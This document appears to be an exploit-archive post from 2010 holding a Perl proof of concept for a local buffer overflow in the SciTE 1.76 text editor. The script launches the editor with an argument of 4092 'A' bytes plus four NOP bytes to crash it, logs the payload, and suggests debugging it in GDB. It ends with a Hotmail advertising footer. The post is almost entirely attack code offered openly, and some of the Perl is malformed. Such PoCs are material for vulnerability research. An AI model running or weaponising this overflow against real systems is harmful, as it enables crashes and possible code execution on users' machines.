# Exploit Title: 0 Days Scite text editor :Local Buffer Overflow (PoC) # Date: 28/06/2010 # Author: kmkz # Version: [Scite 1.76 (lastest version) # Tested on: Linux 2.6.31-22 # Code : Proof of Concept #!/usr/bin/perl -wU # 0-Days PoC (Local BoF Scite 1.76) use strict; use diagnostics; use English '-no_match_vars'; use constant SUCCESS=>(1); use constant FAILLURE=>(0); use constant TARGET_BINARY=>("scite"); use constant PAYLOAD=>(`perl -e 'print "A"x4092 . "\x90\x90\x90\x90"'`); use constant VERSION =>("/usr/share/scite/SciTE.html"); BEGIN: if(-e VERSION) { foreach(VERSION) { my @version_checking=($_=~ //); @version_checking=split(/W/); next if !($' =~ m/1.76/) || warn ("[*] WARNING: not Scite Version 1.76 \012\012"); } my $Exploitation=(system( TARGET_BINARY, PAYLOAD)); open (DUMP ,">> Dump_Scite_Local_BoF_PoC.log") or warn("[-] Can't create dump_file\012\015"); printf(DUMP" [+] This PoC generate a .txt document and crash scite exploiting a local Buffer Overflow (just for example) \012\012\015"); printf("%s\012", $Exploitation ) ; printf(DUMP"[+] Run in GDB for more information (using this payload):\012 %s", PAYLOAD); close(DUMP); exit(SUCCESS); } else { printf("[!] %s : MISSING \012 [!] %s \012\012",VERSION,$!); exit(FAILLURE); } __END__ _________________________________________________________________ Hotmail : une messagerie performante et gratuite avec une sécurité signée Microsoft https://signup.live.com/signup.aspx?id=60969